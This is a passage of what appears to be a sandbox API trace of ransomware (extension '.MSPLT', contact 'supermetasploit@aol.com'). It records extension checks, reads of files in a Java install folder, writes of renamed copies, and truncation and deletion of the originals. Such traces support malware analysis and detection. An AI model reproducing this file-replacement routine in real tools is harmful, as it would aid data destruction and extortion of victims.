(lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.759] lstrlenW (lpString=".doc") returned 4 [0298.759] lstrcmpiW (lpString1=".doc", lpString2="C.pf") returned -1 [0298.759] lstrlenW (lpString=".docx") returned 5 [0298.759] lstrcmpiW (lpString1=".docx", lpString2="CC.pf") returned -1 [0298.759] lstrlenW (lpString=".pdf") returned 4 [0298.759] lstrcmpiW (lpString1=".pdf", lpString2="C.pf") returned -1 [0298.759] lstrlenW (lpString=".xls") returned 4 [0298.759] lstrcmpiW (lpString1=".xls", lpString2="C.pf") returned -1 [0298.759] lstrlenW (lpString=".xlsx") returned 5 [0298.759] lstrcmpiW (lpString1=".xlsx", lpString2="CC.pf") returned -1 [0298.759] lstrlenW (lpString=".ppt") returned 4 [0298.759] lstrcmpiW (lpString1=".ppt", lpString2="C.pf") returned -1 [0298.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.759] lstrlenW (lpString=".zip") returned 4 [0298.759] lstrcmpiW (lpString1=".zip", lpString2="C.pf") returned -1 [0298.759] lstrlenW (lpString=".rar") returned 4 [0298.760] lstrcmpiW (lpString1=".rar", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString=".bz2") returned 4 [0298.760] lstrcmpiW (lpString1=".bz2", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString=".7z") returned 3 [0298.760] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.760] lstrlenW (lpString=".dbf") returned 4 [0298.760] lstrcmpiW (lpString1=".dbf", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.760] lstrlenW (lpString=".1cd") returned 4 [0298.760] lstrcmpiW (lpString1=".1cd", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.760] lstrlenW (lpString=".jpg") returned 4 [0298.760] lstrcmpiW (lpString1=".jpg", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.760] lstrlenW (lpString=".doc") returned 4 [0298.760] lstrcmpiW (lpString1=".doc", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString=".docx") returned 5 [0298.760] lstrcmpiW (lpString1=".docx", lpString2="CC.pf") returned -1 [0298.760] lstrlenW (lpString=".pdf") returned 4 [0298.760] lstrcmpiW (lpString1=".pdf", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString=".xls") returned 4 [0298.760] lstrcmpiW (lpString1=".xls", lpString2="C.pf") returned -1 [0298.760] lstrlenW (lpString=".xlsx") returned 5 [0298.760] lstrcmpiW (lpString1=".xlsx", lpString2="CC.pf") returned -1 [0298.760] lstrlenW (lpString=".ppt") returned 4 [0298.761] lstrcmpiW (lpString1=".ppt", lpString2="C.pf") returned -1 [0298.761] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.761] lstrlenW (lpString=".zip") returned 4 [0298.761] lstrcmpiW (lpString1=".zip", lpString2="C.pf") returned -1 [0298.761] lstrlenW (lpString=".rar") returned 4 [0298.761] lstrcmpiW (lpString1=".rar", lpString2="C.pf") returned -1 [0298.761] lstrlenW (lpString=".bz2") returned 4 [0298.761] lstrcmpiW (lpString1=".bz2", lpString2="C.pf") returned -1 [0298.761] lstrlenW (lpString=".7z") returned 3 [0298.761] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0298.761] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.761] lstrlenW (lpString=".dbf") returned 4 [0298.761] lstrcmpiW (lpString1=".dbf", lpString2="C.pf") returned -1 [0298.761] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.761] lstrlenW (lpString=".1cd") returned 4 [0298.761] lstrcmpiW (lpString1=".1cd", lpString2="C.pf") returned -1 [0298.761] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0298.761] lstrlenW (lpString=".jpg") returned 4 [0298.761] lstrcmpiW (lpString1=".jpg", lpString2="C.pf") returned -1 [0298.761] lstrcmpiW (lpString1=".data", lpString2=".MSPLT") returned -1 [0298.761] lstrlenW (lpString="currency.data") returned 13 [0298.761] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.762] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=4122) returned 1 [0298.762] CloseHandle (hObject=0x378) returned 1 [0298.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data")) returned 0x20 [0298.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.763] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0298.763] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.763] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.763] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.323] GetLastError () returned 0x0 [0299.323] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x101a, lpOverlapped=0x0) returned 1 [0299.324] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1020, lpOverlapped=0x0) returned 1 [0299.326] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.326] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xee, lpOverlapped=0x0) returned 1 [0299.326] SetEndOfFile (hFile=0x4c0) returned 1 [0299.327] CloseHandle (hObject=0x4c0) returned 1 [0299.329] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.329] SetEndOfFile (hFile=0x378) returned 1 [0299.335] CloseHandle (hObject=0x378) returned 1 [0299.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0299.336] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data")) returned 1 [0299.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.338] lstrlenW (lpString=".doc") returned 4 [0299.338] lstrcmpiW (lpString1=".doc", lpString2="data") returned -1 [0299.338] lstrlenW (lpString=".docx") returned 5 [0299.338] lstrcmpiW (lpString1=".docx", lpString2=".data") returned 1 [0299.338] lstrlenW (lpString=".pdf") returned 4 [0299.338] lstrcmpiW (lpString1=".pdf", lpString2="data") returned -1 [0299.338] lstrlenW (lpString=".xls") returned 4 [0299.338] lstrcmpiW (lpString1=".xls", lpString2="data") returned -1 [0299.338] lstrlenW (lpString=".xlsx") returned 5 [0299.338] lstrcmpiW (lpString1=".xlsx", lpString2=".data") returned 1 [0299.338] lstrlenW (lpString=".ppt") returned 4 [0299.338] lstrcmpiW (lpString1=".ppt", lpString2="data") returned -1 [0299.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.339] lstrlenW (lpString=".zip") returned 4 [0299.339] lstrcmpiW (lpString1=".zip", lpString2="data") returned -1 [0299.339] lstrlenW (lpString=".rar") returned 4 [0299.339] lstrcmpiW (lpString1=".rar", lpString2="data") returned -1 [0299.339] lstrlenW (lpString=".bz2") returned 4 [0299.339] lstrcmpiW (lpString1=".bz2", lpString2="data") returned -1 [0299.339] lstrlenW (lpString=".7z") returned 3 [0299.339] lstrcmpiW (lpString1=".7z", lpString2="ata") returned -1 [0299.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.339] lstrlenW (lpString=".dbf") returned 4 [0299.339] lstrcmpiW (lpString1=".dbf", lpString2="data") returned -1 [0299.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.339] lstrlenW (lpString=".1cd") returned 4 [0299.339] lstrcmpiW (lpString1=".1cd", lpString2="data") returned -1 [0299.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.339] lstrlenW (lpString=".jpg") returned 4 [0299.339] lstrcmpiW (lpString1=".jpg", lpString2="data") returned -1 [0299.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.339] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.339] lstrlenW (lpString=".doc") returned 4 [0299.339] lstrcmpiW (lpString1=".doc", lpString2="data") returned -1 [0299.339] lstrlenW (lpString=".docx") returned 5 [0299.340] lstrcmpiW (lpString1=".docx", lpString2=".data") returned 1 [0299.340] lstrlenW (lpString=".pdf") returned 4 [0299.340] lstrcmpiW (lpString1=".pdf", lpString2="data") returned -1 [0299.340] lstrlenW (lpString=".xls") returned 4 [0299.340] lstrcmpiW (lpString1=".xls", lpString2="data") returned -1 [0299.340] lstrlenW (lpString=".xlsx") returned 5 [0299.340] lstrcmpiW (lpString1=".xlsx", lpString2=".data") returned 1 [0299.340] lstrlenW (lpString=".ppt") returned 4 [0299.340] lstrcmpiW (lpString1=".ppt", lpString2="data") returned -1 [0299.340] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.340] lstrlenW (lpString=".zip") returned 4 [0299.340] lstrcmpiW (lpString1=".zip", lpString2="data") returned -1 [0299.340] lstrlenW (lpString=".rar") returned 4 [0299.340] lstrcmpiW (lpString1=".rar", lpString2="data") returned -1 [0299.340] lstrlenW (lpString=".bz2") returned 4 [0299.340] lstrcmpiW (lpString1=".bz2", lpString2="data") returned -1 [0299.340] lstrlenW (lpString=".7z") returned 3 [0299.340] lstrcmpiW (lpString1=".7z", lpString2="ata") returned -1 [0299.340] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.340] lstrlenW (lpString=".dbf") returned 4 [0299.340] lstrcmpiW (lpString1=".dbf", lpString2="data") returned -1 [0299.340] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.340] lstrlenW (lpString=".1cd") returned 4 [0299.341] lstrcmpiW (lpString1=".1cd", lpString2="data") returned -1 [0299.341] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0299.341] lstrlenW (lpString=".jpg") returned 4 [0299.341] lstrcmpiW (lpString1=".jpg", lpString2="data") returned -1 [0299.341] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0299.341] lstrlenW (lpString="messages_de.properties") returned 22 [0299.341] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0299.342] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=3306) returned 1 [0299.342] CloseHandle (hObject=0x378) returned 1 [0299.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties")) returned 0x20 [0299.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.342] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0299.343] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.343] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.343] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0299.344] GetLastError () returned 0x0 [0299.344] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xcea, lpOverlapped=0x0) returned 1 [0299.346] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xcf0, lpOverlapped=0x0) returned 1 [0299.347] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.347] WriteFile (in: hFile=0x4c0, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x100, lpOverlapped=0x0) returned 1 [0299.348] SetEndOfFile (hFile=0x4c0) returned 1 [0299.349] CloseHandle (hObject=0x4c0) returned 1 [0299.349] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.350] SetEndOfFile (hFile=0x378) returned 1 [0299.356] CloseHandle (hObject=0x378) returned 1 [0299.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0299.356] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties")) returned 1 [0299.357] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.357] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.357] lstrlenW (lpString=".doc") returned 4 [0299.357] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.357] lstrlenW (lpString=".docx") returned 5 [0299.357] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.357] lstrlenW (lpString=".pdf") returned 4 [0299.358] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.358] lstrlenW (lpString=".xls") returned 4 [0299.358] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.358] lstrlenW (lpString=".xlsx") returned 5 [0299.358] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.358] lstrlenW (lpString=".ppt") returned 4 [0299.358] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.358] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.358] lstrlenW (lpString=".zip") returned 4 [0299.358] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.358] lstrlenW (lpString=".rar") returned 4 [0299.358] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.358] lstrlenW (lpString=".bz2") returned 4 [0299.358] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.358] lstrlenW (lpString=".7z") returned 3 [0299.358] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.358] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.358] lstrlenW (lpString=".dbf") returned 4 [0299.358] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.358] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.358] lstrlenW (lpString=".1cd") returned 4 [0299.358] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.359] lstrlenW (lpString=".jpg") returned 4 [0299.359] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.359] lstrlenW (lpString=".doc") returned 4 [0299.359] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.359] lstrlenW (lpString=".docx") returned 5 [0299.359] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.359] lstrlenW (lpString=".pdf") returned 4 [0299.359] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.359] lstrlenW (lpString=".xls") returned 4 [0299.359] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.359] lstrlenW (lpString=".xlsx") returned 5 [0299.359] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.359] lstrlenW (lpString=".ppt") returned 4 [0299.359] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.359] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.359] lstrlenW (lpString=".zip") returned 4 [0299.359] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.359] lstrlenW (lpString=".rar") returned 4 [0299.359] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.360] lstrlenW (lpString=".bz2") returned 4 [0299.360] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.360] lstrlenW (lpString=".7z") returned 3 [0299.360] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.360] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.360] lstrlenW (lpString=".dbf") returned 4 [0299.360] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.360] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.360] lstrlenW (lpString=".1cd") returned 4 [0299.360] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0299.360] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 68 [0299.360] lstrlenW (lpString=".jpg") returned 4 [0299.360] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0299.360] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0299.360] lstrlenW (lpString="messages_es.properties") returned 22 [0299.360] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0299.471] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=3600) returned 1 [0299.471] CloseHandle (hObject=0x464) returned 1 [0299.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties")) returned 0x20 [0299.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.472] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0299.472] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.472] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.472] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0299.472] GetLastError () returned 0x0 [0299.472] ReadFile (in: hFile=0x464, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xe10, lpOverlapped=0x0) returned 1 [0299.481] WriteFile (in: hFile=0x470, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xe20, lpOverlapped=0x0) returned 1 [0299.482] ReadFile (in: hFile=0x464, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.482] WriteFile (in: hFile=0x470, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x100, lpOverlapped=0x0) returned 1 [0299.482] SetEndOfFile (hFile=0x470) returned 1 [0299.482] CloseHandle (hObject=0x470) returned 1 [0299.483] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.483] SetEndOfFile (hFile=0x464) returned 1 [0299.487] CloseHandle (hObject=0x464) returned 1 [0299.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0299.487] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties")) returned 1 [0299.488] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.488] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.488] lstrlenW (lpString=".doc") returned 4 [0299.488] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0299.488] lstrlenW (lpString=".docx") returned 5 [0299.488] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0299.488] lstrlenW (lpString=".pdf") returned 4 [0299.488] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0299.488] lstrlenW (lpString=".xls") returned 4 [0299.488] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0299.488] lstrlenW (lpString=".xlsx") returned 5 [0299.488] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0299.488] lstrlenW (lpString=".ppt") returned 4 [0299.488] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0299.488] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.488] lstrlenW (lpString=".zip") returned 4 [0299.489] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0299.489] lstrlenW (lpString=".rar") returned 4 [0299.489] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0299.489] lstrlenW (lpString=".bz2") returned 4 [0299.489] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0299.489] lstrlenW (lpString=".7z") returned 3 [0299.489] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0299.489] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 68 [0299.489] lstrlenW (lpString=".dbf") returned 4 [0299.489] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0299.489] 